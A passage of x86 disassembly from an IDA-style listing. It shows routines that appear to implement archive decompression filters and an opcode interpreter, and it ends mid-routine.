mov dl, [eax]
or eax, 0FFFFFFFFh
shl edx, 10h
or edx, esi
shr edx, cl
pop ecx
sub ecx, [esp+4+arg_4]
pop esi
shr eax, cl
and eax, edx
retn
sub_9B2A86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B2AC6 proc near ; CODE XREF: sub_9B2B17+469�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov eax, ecx
push 8
cdq
pop esi
idiv esi
and ecx, 7
push 20h
or edx, 0FFFFFFFFh
xor edi, edi
mov esi, eax
mov eax, ecx
pop ecx
sub ecx, [ebp+arg_8]
shr edx, cl
mov ecx, eax
mov eax, [ebp+arg_0]
shl [ebp+arg_4], cl
shl edx, cl
add esi, eax
not edx
loc_9B2AF5: ; CODE XREF: sub_9B2AC6+4B�j
mov al, [esi+edi]
and al, dl
or al, byte ptr [ebp+arg_4]
shr [ebp+arg_4], 8
shr edx, 8
or edx, 0FF000000h
mov [esi+edi], al
inc edi
cmp edi, 4
jl short loc_9B2AF5
pop edi
pop esi
pop ebp
retn
sub_9B2AC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B2B17 proc near ; CODE XREF: sub_9B300B+607�p
Dst = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
mov esi, ecx
xor edi, edi
cmp esi, edi
jle loc_9B3007
cmp esi, 2
push ebx
jle loc_9B2F9F
cmp esi, 3
jz loc_9B2EEB
cmp esi, 4
jz loc_9B2DCB
cmp esi, 5
jz loc_9B2C04
cmp esi, 6
jz short loc_9B2BAB
cmp esi, 7
jnz loc_9B3006
mov edi, [eax+14h]
xor esi, esi
cmp edi, 1E000h
mov ebx, edi
jge loc_9B3006
test edi, edi
jle short loc_9B2B94
loc_9B2B75: ; CODE XREF: sub_9B2B17+7B�j
mov ecx, [eax]
mov dl, [ecx+esi]
inc esi
cmp dl, 2
jnz short loc_9B2B8C
mov dl, [ecx+esi]
inc esi
cmp dl, 2
jz short loc_9B2B8C
add dl, 0E0h
loc_9B2B8C: ; CODE XREF: sub_9B2B17+67�j
; sub_9B2B17+70�j
mov [ecx+ebx], dl
inc ebx
cmp esi, edi
jl short loc_9B2B75
loc_9B2B94: ; CODE XREF: sub_9B2B17+5C�j
mov ecx, [eax]
sub ebx, edi
mov [ecx+3C01Ch], ebx
mov eax, [eax]
mov [eax+3C020h], edi
jmp loc_9B3006
; ---------------------------------------------------------------------------
loc_9B2BAB: ; CODE XREF: sub_9B2B17+3C�j
mov edx, [eax+14h]
mov ecx, [eax+4]
mov edi, [eax]
xor ebx, ebx
cmp edx, 1E000h
mov [ebp+var_2C], ecx
lea esi, [edx+edx]
mov [edi+3C020h], edx
jge loc_9B3006
and [ebp+var_8], ebx
test ecx, ecx
jle loc_9B3006
loc_9B2BD8: ; CODE XREF: sub_9B2B17+E6�j
mov edi, [ebp+var_8]
xor cl, cl
add edi, edx
jmp short loc_9B2BF0
; ---------------------------------------------------------------------------
loc_9B2BE1: ; CODE XREF: sub_9B2B17+DB�j
mov esi, [eax]
sub cl, [esi+ebx]
inc ebx
mov [esi+edi], cl
add edi, [ebp+var_2C]
lea esi, [edx+edx]
loc_9B2BF0: ; CODE XREF: sub_9B2B17+C8�j
cmp edi, esi
jl short loc_9B2BE1
inc [ebp+var_8]
mov ecx, [ebp+var_8]
cmp ecx, [ebp+var_2C]
jl short loc_9B2BD8
jmp loc_9B3006
; ---------------------------------------------------------------------------
loc_9B2C04: ; CODE XREF: sub_9B2B17+33�j
mov esi, [eax+14h]
cmp esi, 1E000h
mov ecx, [eax+4]
mov eax, [eax]
lea edx, [eax+esi]
mov [ebp+var_38], ecx
mov [ebp+var_20], esi
mov [ebp+var_18], eax
mov [ebp+var_28], edx
mov [eax+3C020h], esi
jge loc_9B3006
cmp ecx, edi
mov [ebp+var_8], edi
jle loc_9B3006
jmp short loc_9B2C3D
; ---------------------------------------------------------------------------
loc_9B2C3A: ; CODE XREF: sub_9B2B17+2A9�j
mov esi, [ebp+var_20]
loc_9B2C3D: ; CODE XREF: sub_9B2B17+121�j
xor ebx, ebx
push 1Ch ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_34], ebx
mov [ebp+var_30], ebx
mov [ebp+var_24], ebx
mov [ebp+var_14], ebx
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
call memset
mov eax, [ebp+var_8]
add esp, 0Ch
mov [ebp+var_2C], ebx
cmp eax, esi
jmp loc_9B2DAE
; ---------------------------------------------------------------------------
loc_9B2C6D: ; CODE XREF: sub_9B2B17+29A�j
mov eax, [ebp+var_30]
mov esi, [ebp+var_C]
mov edx, [ebp+var_10]
mov ecx, eax
sub ecx, [ebp+var_24]
mov edi, ebx
mov ebx, ecx
imul esi, edi
mov ecx, [ebp+var_18]
imul edx, ebx
mov cl, [ecx]
add esi, edx
mov edx, [ebp+var_14]
imul edx, eax
inc [ebp+var_18]
add esi, edx
mov edx, [ebp+var_34]
mov [ebp+var_24], eax
mov [ebp+var_1], cl
lea eax, [esi+edx*8]
mov esi, [ebp+var_1C]
movzx ecx, cl
shr eax, 3
and eax, 0FFh
sub eax, ecx
mov ecx, [ebp+var_28]
mov [ecx+esi], al
movsx esi, [ebp+var_1]
mov cl, al
sub cl, dl
movsx ecx, cl
shl esi, 3
push esi ; X
mov [ebp+var_30], ecx
mov [ebp+var_34], eax
call labs
add [ebp+Dst], eax
mov eax, esi
sub eax, [ebp+var_24]
push eax ; X
call labs
add [ebp+var_50], eax
mov eax, [ebp+var_24]
add eax, esi
push eax ; X
call labs
add [ebp+var_4C], eax
mov eax, esi
sub eax, ebx
push eax ; X
call labs
add [ebp+var_48], eax
lea eax, [esi+ebx]
push eax ; X
call labs
add [ebp+var_44], eax
mov eax, esi
sub eax, edi
push eax ; X
call labs
add [ebp+var_40], eax
add esi, edi
push esi ; X
call labs
add [ebp+var_3C], eax
add esp, 1Ch
test byte ptr [ebp+var_2C], 1Fh
jnz short loc_9B2DA2
mov esi, [ebp+Dst]
xor edi, edi
xor ecx, ecx
mov [ebp+Dst], edi
inc ecx
loc_9B2D37: ; CODE XREF: sub_9B2B17+235�j
lea eax, [ebp+ecx*4+Dst]
mov edx, [eax]
cmp edx, esi
jnb short loc_9B2D45
mov esi, edx
mov edi, ecx
loc_9B2D45: ; CODE XREF: sub_9B2B17+228�j
and dword ptr [eax], 0
inc ecx
cmp ecx, 7
jb short loc_9B2D37
mov eax, edi
dec eax
jz short loc_9B2D99
dec eax
jz short loc_9B2D8E
dec eax
jz short loc_9B2D83
dec eax
jz short loc_9B2D78
dec eax
jz short loc_9B2D6D
dec eax
jnz short loc_9B2DA2
cmp [ebp+var_C], 10h
jge short loc_9B2DA2
inc [ebp+var_C]
jmp short loc_9B2DA2
; ---------------------------------------------------------------------------
loc_9B2D6D: ; CODE XREF: sub_9B2B17+246�j
cmp [ebp+var_C], 0FFFFFFF0h
jl short loc_9B2DA2
dec [ebp+var_C]
jmp short loc_9B2DA2
; ---------------------------------------------------------------------------
loc_9B2D78: ; CODE XREF: sub_9B2B17+243�j
cmp [ebp+var_10], 10h
jge short loc_9B2DA2
inc [ebp+var_10]
jmp short loc_9B2DA2
; ---------------------------------------------------------------------------
loc_9B2D83: ; CODE XREF: sub_9B2B17+240�j
cmp [ebp+var_10], 0FFFFFFF0h
jl short loc_9B2DA2
dec [ebp+var_10]
jmp short loc_9B2DA2
; ---------------------------------------------------------------------------
loc_9B2D8E: ; CODE XREF: sub_9B2B17+23D�j
cmp [ebp+var_14], 10h
jge short loc_9B2DA2
inc [ebp+var_14]
jmp short loc_9B2DA2
; ---------------------------------------------------------------------------
loc_9B2D99: ; CODE XREF: sub_9B2B17+23A�j
cmp [ebp+var_14], 0FFFFFFF0h
jl short loc_9B2DA2
dec [ebp+var_14]
loc_9B2DA2: ; CODE XREF: sub_9B2B17+213�j
; sub_9B2B17+249�j ...
mov eax, [ebp+var_1C]
add eax, [ebp+var_38]
inc [ebp+var_2C]
cmp eax, [ebp+var_20]
loc_9B2DAE: ; CODE XREF: sub_9B2B17+151�j
mov [ebp+var_1C], eax
jl loc_9B2C6D
inc [ebp+var_8]
mov eax, [ebp+var_8]
cmp eax, [ebp+var_38]
jl loc_9B2C3A
jmp loc_9B3006
; ---------------------------------------------------------------------------
loc_9B2DCB: ; CODE XREF: sub_9B2B17+2A�j
mov ecx, [eax+14h]
mov edx, [eax+8]
mov ebx, [eax+4]
mov eax, [eax]
mov [ebp+var_C], edx
sub ebx, 3
cmp ecx, 1E000h
lea edx, [eax+ecx]
mov [ebp+var_20], ecx
mov [ebp+var_18], eax
mov [ebp+var_28], edx
mov [eax+3C020h], ecx
jge loc_9B3006
mov eax, ebx
neg eax
mov [ebp+var_8], edi
mov [ebp+var_24], eax
loc_9B2E04: ; CODE XREF: sub_9B2B17+3A3�j
mov eax, [ebp+var_20]
and [ebp+var_1C], 0
cmp [ebp+var_8], eax
jge loc_9B2EB0
mov eax, [ebp+var_24]
mov esi, [ebp+var_28]
mov [ebp+var_2C], eax
mov eax, [ebp+var_20]
sub eax, [ebp+var_8]
sub esi, ebx
add esi, [ebp+var_8]
push 3
dec eax
xor edx, edx
pop ecx
div ecx
inc eax
mov [ebp+var_10], eax
loc_9B2E34: ; CODE XREF: sub_9B2B17+397�j
cmp [ebp+var_2C], 3
jl short loc_9B2E90
movzx edi, byte ptr [esi]
movzx eax, byte ptr [esi-3]
mov [ebp+var_30], edi
sub edi, eax
add edi, [ebp+var_1C]
mov [ebp+var_14], eax
mov eax, edi
sub eax, [ebp+var_1C]
push eax ; X
call labs
mov [ebp+var_38], eax
mov eax, edi
sub eax, [ebp+var_30]
push eax ; X
call labs
sub edi, [ebp+var_14]
mov [ebp+var_34], eax
push edi ; X
call labs
mov ecx, [ebp+var_34]
add esp, 0Ch
cmp [ebp+var_38], ecx
jg short loc_9B2E81
cmp [ebp+var_38], eax
jle short loc_9B2E90
loc_9B2E81: ; CODE XREF: sub_9B2B17+363�j
cmp [ebp+var_34], eax
jg short loc_9B2E8B
mov eax, [ebp+var_30]
jmp short loc_9B2E93
; ---------------------------------------------------------------------------
loc_9B2E8B: ; CODE XREF: sub_9B2B17+36D�j
mov eax, [ebp+var_14]
jmp short loc_9B2E93
; ---------------------------------------------------------------------------
loc_9B2E90: ; CODE XREF: sub_9B2B17+321�j
; sub_9B2B17+368�j
mov eax, [ebp+var_1C]
loc_9B2E93: ; CODE XREF: sub_9B2B17+372�j
; sub_9B2B17+377�j
mov ecx, [ebp+var_18]
sub al, [ecx]
inc [ebp+var_18]
add [ebp+var_2C], 3
movzx eax, al
mov [ebx+esi], al
add esi, 3
dec [ebp+var_10]
mov [ebp+var_1C], eax
jnz short loc_9B2E34
loc_9B2EB0: ; CODE XREF: sub_9B2B17+2F7�j
inc [ebp+var_8]
inc [ebp+var_24]
cmp [ebp+var_8], 3
jl loc_9B2E04
mov esi, [ebp+var_20]
mov eax, [ebp+var_C]
add esi, 0FFFFFFFEh
cmp eax, esi
jge loc_9B3006
mov edx, [ebp+var_28]
loc_9B2ED4: ; CODE XREF: sub_9B2B17+3CD�j
mov cl, [edx+eax+1]
add [edx+eax], cl
add [edx+eax+2], cl
add eax, 3
cmp eax, esi
jl short loc_9B2ED4
jmp loc_9B3006
; ---------------------------------------------------------------------------
loc_9B2EEB: ; CODE XREF: sub_9B2B17+21�j
mov ecx, [eax]
mov [ebp+var_20], ecx
mov ecx, [eax+14h]
cmp ecx, 3C000h
jge loc_9B3006
cmp ecx, 15h
jl loc_9B3006
mov ebx, [eax+1Ch]
lea eax, [ecx-15h]
shr ebx, 4
cmp eax, edi
jbe loc_9B3006
dec eax
shr eax, 4
inc eax
mov [ebp+var_38], eax
loc_9B2F21: ; CODE XREF: sub_9B2B17+484�j
mov eax, [ebp+var_20]
movzx eax, byte ptr [eax]
and eax, 1Fh
sub eax, 10h
js short loc_9B2F93
mov al, ds:byte_9B9DE8[eax]
test al, al
jz short loc_9B2F93
and [ebp+var_1C], 0
push 12h
movzx edi, al
pop esi
loc_9B2F43: ; CODE XREF: sub_9B2B17+47A�j
mov ecx, [ebp+var_1C]
xor eax, eax
inc eax
shl eax, cl
test edi, eax
jz short loc_9B2F88
mov ecx, [ebp+var_20]
lea eax, [esi+18h]
push 4
push eax
call sub_9B2A86
cmp eax, 5
pop ecx
pop ecx
jnz short loc_9B2F88
mov ecx, [ebp+var_20]
push 14h
push 14h
push esi
call sub_9B2A86
pop ecx
sub eax, ebx
pop ecx
and eax, 0FFFFFh
push eax
push [ebp+var_20]
mov ecx, esi
call sub_9B2AC6
add esp, 0Ch
loc_9B2F88: ; CODE XREF: sub_9B2B17+436�j
; sub_9B2B17+44B�j
inc [ebp+var_1C]
add esi, 29h
cmp esi, 64h
jle short loc_9B2F43
loc_9B2F93: ; CODE XREF: sub_9B2B17+416�j
; sub_9B2B17+420�j
add [ebp+var_20], 10h
inc ebx
dec [ebp+var_38]
jnz short loc_9B2F21
jmp short loc_9B3006
; ---------------------------------------------------------------------------
loc_9B2F9F: ; CODE XREF: sub_9B2B17+18�j
mov ecx, [eax+14h]
cmp ecx, 3C000h
mov edx, [eax]
mov eax, [eax+1Ch]
jge short loc_9B3006
cmp ecx, 4
jl short loc_9B3006
cmp esi, 2
setz bl
add ecx, 0FFFFFFFCh
add bl, 0E8h
cmp ecx, edi
mov [ebp+var_20], edi
jbe short loc_9B3006
mov esi, eax
loc_9B2FC9: ; CODE XREF: sub_9B2B17+4ED�j
mov al, [edx]
inc edx
inc [ebp+var_20]
inc esi
cmp al, 0E8h
jz short loc_9B2FD8
cmp al, bl
jnz short loc_9B3001
loc_9B2FD8: ; CODE XREF: sub_9B2B17+4BB�j
mov eax, [edx]
test eax, eax
jge short loc_9B2FEC
lea edi, [esi+eax]
test edi, edi
jl short loc_9B2FF7
add eax, 1000000h
jmp short loc_9B2FF5
; ---------------------------------------------------------------------------
loc_9B2FEC: ; CODE XREF: sub_9B2B17+4C5�j
cmp eax, 1000000h
jge short loc_9B2FF7
sub eax, esi
loc_9B2FF5: ; CODE XREF: sub_9B2B17+4D3�j
mov [edx], eax
loc_9B2FF7: ; CODE XREF: sub_9B2B17+4CC�j
; sub_9B2B17+4DA�j
add [ebp+var_20], 4
add edx, 4
add esi, 4
loc_9B3001: ; CODE XREF: sub_9B2B17+4BF�j
cmp [ebp+var_20], ecx
jb short loc_9B2FC9
loc_9B3006: ; CODE XREF: sub_9B2B17+41�j
; sub_9B2B17+54�j ...
pop ebx
loc_9B3007: ; CODE XREF: sub_9B2B17+E�j
pop edi
pop esi
leave
retn
sub_9B2B17 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B300B proc near ; CODE XREF: sub_9B3713+96�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_4]
mov edx, [ebp+arg_0]
lea eax, [eax+eax*4]
push ebx
lea eax, [edx+eax*8]
cmp edx, eax
mov ebx, edx
push esi
mov [ebp+var_4], 17D7840h
mov [ebp+var_8], ebx
mov [ebp+var_10], eax
jbe short loc_9B303B
loc_9B3032: ; CODE XREF: sub_9B300B+32�j
; sub_9B300B+2A0�j ...
xor eax, eax
loc_9B3034: ; CODE XREF: sub_9B300B+626�j
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9B3038: ; CODE XREF: sub_9B300B+618�j
mov edx, [ebp+arg_0]
loc_9B303B: ; CODE XREF: sub_9B300B+25�j
cmp ebx, edx
jb short loc_9B3032
lea eax, [ebx+8]
push edi
call sub_9B2A6A
mov esi, eax
lea eax, [ebx+18h]
push edi
call sub_9B2A6A
pop ecx
pop ecx
mov ecx, [ebx]
cmp ecx, 36h ; switch 55 cases
ja loc_9B3617 ; default
; jumptable 009B3060 case 39
jmp ds:off_9B3637[ecx*4] ; switch jump
loc_9B3067: ; DATA XREF: .text:off_9B3637�o
cmp dword ptr [ebx+4], 0 ; jumptable 009B3060 case 0
jz short loc_9B3075 ; jumptable 009B3060 case 41
movzx eax, byte ptr [eax]
jmp loc_9B3544
; ---------------------------------------------------------------------------
loc_9B3075: ; CODE XREF: sub_9B300B+55�j
; sub_9B300B+60�j
; DATA XREF: ...
mov eax, [eax] ; jumptable 009B3060 case 41
loc_9B3077: ; CODE XREF: sub_9B300B+32C�j
; sub_9B300B+4AC�j ...
mov [esi], eax
jmp loc_9B3617 ; default
; jumptable 009B3060 case 39
; ---------------------------------------------------------------------------
loc_9B307E: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov al, [eax] ; jumptable 009B3060 case 40
jmp loc_9B3544
; ---------------------------------------------------------------------------
loc_9B3085: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov ecx, [ebx+4] ; jumptable 009B3060 case 1
test ecx, ecx
jz short loc_9B3091
movzx esi, byte ptr [esi]
jmp short loc_9B3093
; ---------------------------------------------------------------------------
loc_9B3091: ; CODE XREF: sub_9B300B+7F�j
mov esi, [esi]
loc_9B3093: ; CODE XREF: sub_9B300B+84�j
test ecx, ecx
jz short loc_9B309C
movzx eax, byte ptr [eax]
jmp short loc_9B309E
; ---------------------------------------------------------------------------
loc_9B309C: ; CODE XREF: sub_9B300B+8A�j
mov eax, [eax]
loc_9B309E: ; CODE XREF: sub_9B300B+8F�j
mov ecx, esi
sub ecx, eax
loc_9B30A2: ; CODE XREF: sub_9B300B+E0�j
jnz short loc_9B30AC
loc_9B30A4: ; CODE XREF: sub_9B300B:loc_9B3258�j
push 2
pop eax
jmp loc_9B3263
; ---------------------------------------------------------------------------
loc_9B30AC: ; CODE XREF: sub_9B300B:loc_9B30A2�j
cmp esi, ecx
sbb eax, eax
neg eax
and ecx, 80000000h
or eax, ecx
jmp loc_9B3263
; ---------------------------------------------------------------------------
loc_9B30BF: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
movzx ecx, byte ptr [esi] ; jumptable 009B3060 case 42
movzx edx, byte ptr [eax]
mov eax, ecx
sub eax, edx
jnz short loc_9B30D0
push 2
pop ecx
jmp short loc_9B30DD
; ---------------------------------------------------------------------------
loc_9B30D0: ; CODE XREF: sub_9B300B+BE�j
cmp ecx, eax
sbb ecx, ecx
neg ecx
and eax, 80000000h
or ecx, eax
loc_9B30DD: ; CODE XREF: sub_9B300B+C3�j
mov [edi+24h], ecx
jmp loc_9B3617 ; default
; jumptable 009B3060 case 39
; ---------------------------------------------------------------------------
loc_9B30E5: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov esi, [esi] ; jumptable 009B3060 case 43
mov ecx, esi
sub ecx, [eax]
jmp short loc_9B30A2
; ---------------------------------------------------------------------------
loc_9B30ED: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov ecx, [ebx+4] ; jumptable 009B3060 case 2
test ecx, ecx
jz short loc_9B30F9
movzx edx, byte ptr [esi]
jmp short loc_9B30FB
; ---------------------------------------------------------------------------
loc_9B30F9: ; CODE XREF: sub_9B300B+E7�j
mov edx, [esi]
loc_9B30FB: ; CODE XREF: sub_9B300B+EC�j
test ecx, ecx
jz short loc_9B3104
movzx eax, byte ptr [eax]
jmp short loc_9B3106
; ---------------------------------------------------------------------------
loc_9B3104: ; CODE XREF: sub_9B300B+F2�j
mov eax, [eax]
loc_9B3106: ; CODE XREF: sub_9B300B+F7�j
lea ecx, [eax+edx]
test ecx, ecx
jz loc_9B3229
cmp ecx, edx
jmp short loc_9B314C
; ---------------------------------------------------------------------------
loc_9B3115: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov al, [eax] ; jumptable 009B3060 case 44
add [esi], al
jmp loc_9B3617 ; default
; jumptable 009B3060 case 39
; ---------------------------------------------------------------------------
loc_9B311E: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov eax, [eax] ; jumptable 009B3060 case 45
add [esi], eax
jmp loc_9B3617 ; default
; jumptable 009B3060 case 39
; ---------------------------------------------------------------------------
loc_9B3127: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov ecx, [ebx+4] ; jumptable 009B3060 case 3
test ecx, ecx
jz short loc_9B3133
movzx edx, byte ptr [esi]
jmp short loc_9B3135
; ---------------------------------------------------------------------------
loc_9B3133: ; CODE XREF: sub_9B300B+121�j
mov edx, [esi]
loc_9B3135: ; CODE XREF: sub_9B300B+126�j
test ecx, ecx
jz short loc_9B313E
movzx eax, byte ptr [eax]
jmp short loc_9B3140
; ---------------------------------------------------------------------------
loc_9B313E: ; CODE XREF: sub_9B300B+12C�j
mov eax, [eax]
loc_9B3140: ; CODE XREF: sub_9B300B+131�j
mov ecx, edx
sub ecx, eax
jz loc_9B3229
cmp edx, ecx
loc_9B314C: ; CODE XREF: sub_9B300B+108�j
sbb eax, eax
mov edx, ecx
neg eax
and edx, 80000000h
or eax, edx
jmp loc_9B33F7
; ---------------------------------------------------------------------------
loc_9B315F: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov al, [eax] ; jumptable 009B3060 case 46
sub [esi], al
jmp loc_9B3617 ; default
; jumptable 009B3060 case 39
; ---------------------------------------------------------------------------
loc_9B3168: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov eax, [eax] ; jumptable 009B3060 case 47
sub [esi], eax
jmp loc_9B3617 ; default
; jumptable 009B3060 case 39
; ---------------------------------------------------------------------------
loc_9B3171: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
test byte ptr [edi+24h], 2 ; jumptable 009B3060 case 4
jmp loc_9B3281
; ---------------------------------------------------------------------------
loc_9B317A: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
test byte ptr [edi+24h], 2 ; jumptable 009B3060 case 5
jmp loc_9B3293
; ---------------------------------------------------------------------------
loc_9B3183: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov ecx, [ebx+4] ; jumptable 009B3060 case 6
test ecx, ecx
jz short loc_9B318F
movzx eax, byte ptr [esi]
jmp short loc_9B3191
; ---------------------------------------------------------------------------
loc_9B318F: ; CODE XREF: sub_9B300B+17D�j
mov eax, [esi]
loc_9B3191: ; CODE XREF: sub_9B300B+182�j
inc eax
jmp short loc_9B31BA
; ---------------------------------------------------------------------------
loc_9B3194: ; CODE XREF: sub_9B300B+1B1�j
mov [esi], eax
loc_9B3196: ; CODE XREF: sub_9B300B+1B5�j
test eax, eax
jmp loc_9B3258
; ---------------------------------------------------------------------------
loc_9B319D: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
inc byte ptr [esi] ; jumptable 009B3060 case 48
jmp loc_9B3617 ; default
; jumptable 009B3060 case 39
; ---------------------------------------------------------------------------
loc_9B31A4: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
inc dword ptr [esi] ; jumptable 009B3060 case 49
jmp loc_9B3617 ; default
; jumptable 009B3060 case 39
; ---------------------------------------------------------------------------
loc_9B31AB: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov ecx, [ebx+4] ; jumptable 009B3060 case 7
test ecx, ecx
jz short loc_9B31B7
movzx eax, byte ptr [esi]
jmp short loc_9B31B9
; ---------------------------------------------------------------------------
loc_9B31B7: ; CODE XREF: sub_9B300B+1A5�j
mov eax, [esi]
loc_9B31B9: ; CODE XREF: sub_9B300B+1AA�j
dec eax
loc_9B31BA: ; CODE XREF: sub_9B300B+187�j
test ecx, ecx
jz short loc_9B3194
mov [esi], al
jmp short loc_9B3196
; ---------------------------------------------------------------------------
loc_9B31C2: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
dec byte ptr [esi] ; jumptable 009B3060 case 50
jmp loc_9B3617 ; default
; jumptable 009B3060 case 39
; ---------------------------------------------------------------------------
loc_9B31C9: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
dec dword ptr [esi] ; jumptable 009B3060 case 51
jmp loc_9B3617 ; default
; jumptable 009B3060 case 39
; ---------------------------------------------------------------------------
loc_9B31D0: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov ecx, [ebx+4] ; jumptable 009B3060 case 9
test ecx, ecx
jz short loc_9B31DC
movzx edx, byte ptr [esi]
jmp short loc_9B31DE
; ---------------------------------------------------------------------------
loc_9B31DC: ; CODE XREF: sub_9B300B+1CA�j
mov edx, [esi]
loc_9B31DE: ; CODE XREF: sub_9B300B+1CF�j
test ecx, ecx
jz short loc_9B31E7
movzx eax, byte ptr [eax]
jmp short loc_9B31E9
; ---------------------------------------------------------------------------
loc_9B31E7: ; CODE XREF: sub_9B300B+1D5�j
mov eax, [eax]
loc_9B31E9: ; CODE XREF: sub_9B300B+1DA�j
xor eax, edx
jmp short loc_9B3225
; ---------------------------------------------------------------------------
loc_9B31ED: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov ecx, [ebx+4] ; jumptable 009B3060 case 10
test ecx, ecx
jz short loc_9B31F9
movzx edx, byte ptr [esi]
jmp short loc_9B31FB
; ---------------------------------------------------------------------------
loc_9B31F9: ; CODE XREF: sub_9B300B+1E7�j
mov edx, [esi]
loc_9B31FB: ; CODE XREF: sub_9B300B+1EC�j
test ecx, ecx
jz short loc_9B3204
movzx eax, byte ptr [eax]
jmp short loc_9B3206
; ---------------------------------------------------------------------------
loc_9B3204: ; CODE XREF: sub_9B300B+1F2�j
mov eax, [eax]
loc_9B3206: ; CODE XREF: sub_9B300B+1F7�j
and eax, edx
jmp short loc_9B3225
; ---------------------------------------------------------------------------
loc_9B320A: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov ecx, [ebx+4] ; jumptable 009B3060 case 11
test ecx, ecx
jz short loc_9B3216
movzx edx, byte ptr [esi]
jmp short loc_9B3218
; ---------------------------------------------------------------------------
loc_9B3216: ; CODE XREF: sub_9B300B+204�j
mov edx, [esi]
loc_9B3218: ; CODE XREF: sub_9B300B+209�j
test ecx, ecx
jz short loc_9B3221
movzx eax, byte ptr [eax]
jmp short loc_9B3223
; ---------------------------------------------------------------------------
loc_9B3221: ; CODE XREF: sub_9B300B+20F�j
mov eax, [eax]
loc_9B3223: ; CODE XREF: sub_9B300B+214�j
or eax, edx
loc_9B3225: ; CODE XREF: sub_9B300B+1E0�j
; sub_9B300B+1FD�j
mov ecx, eax
jnz short loc_9B3231
loc_9B3229: ; CODE XREF: sub_9B300B+100�j
; sub_9B300B+139�j ...
push 2
pop eax
jmp loc_9B33F7
; ---------------------------------------------------------------------------
loc_9B3231: ; CODE XREF: sub_9B300B+21C�j
mov eax, ecx
and eax, 80000000h
jmp loc_9B33F7
; ---------------------------------------------------------------------------
loc_9B323D: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov ecx, [ebx+4] ; jumptable 009B3060 case 12
test ecx, ecx
jz short loc_9B3249
movzx esi, byte ptr [esi]
jmp short loc_9B324B
; ---------------------------------------------------------------------------
loc_9B3249: ; CODE XREF: sub_9B300B+237�j
mov esi, [esi]
loc_9B324B: ; CODE XREF: sub_9B300B+23C�j
test ecx, ecx
jz short loc_9B3254
movzx eax, byte ptr [eax]
jmp short loc_9B3256
; ---------------------------------------------------------------------------
loc_9B3254: ; CODE XREF: sub_9B300B+242�j
mov eax, [eax]
loc_9B3256: ; CODE XREF: sub_9B300B+247�j
and eax, esi
loc_9B3258: ; CODE XREF: sub_9B300B+18D�j
jz loc_9B30A4
and eax, 80000000h
loc_9B3263: ; CODE XREF: sub_9B300B+9C�j
; sub_9B300B+AF�j
mov [edi+24h], eax
jmp loc_9B3617 ; default
; jumptable 009B3060 case 39
; ---------------------------------------------------------------------------
loc_9B326B: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
test byte ptr [edi+27h], 80h ; jumptable 009B3060 case 13
jmp short loc_9B3281
; ---------------------------------------------------------------------------
loc_9B3271: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
test byte ptr [edi+27h], 80h ; jumptable 009B3060 case 14
jmp short loc_9B3293
; ---------------------------------------------------------------------------
loc_9B3277: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
test byte ptr [edi+24h], 1 ; jumptable 009B3060 case 15
jmp short loc_9B3281
; ---------------------------------------------------------------------------
loc_9B327D: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
test byte ptr [edi+24h], 3 ; jumptable 009B3060 case 16
loc_9B3281: ; CODE XREF: sub_9B300B+16A�j
; sub_9B300B+264�j ...
jz loc_9B3617 ; default
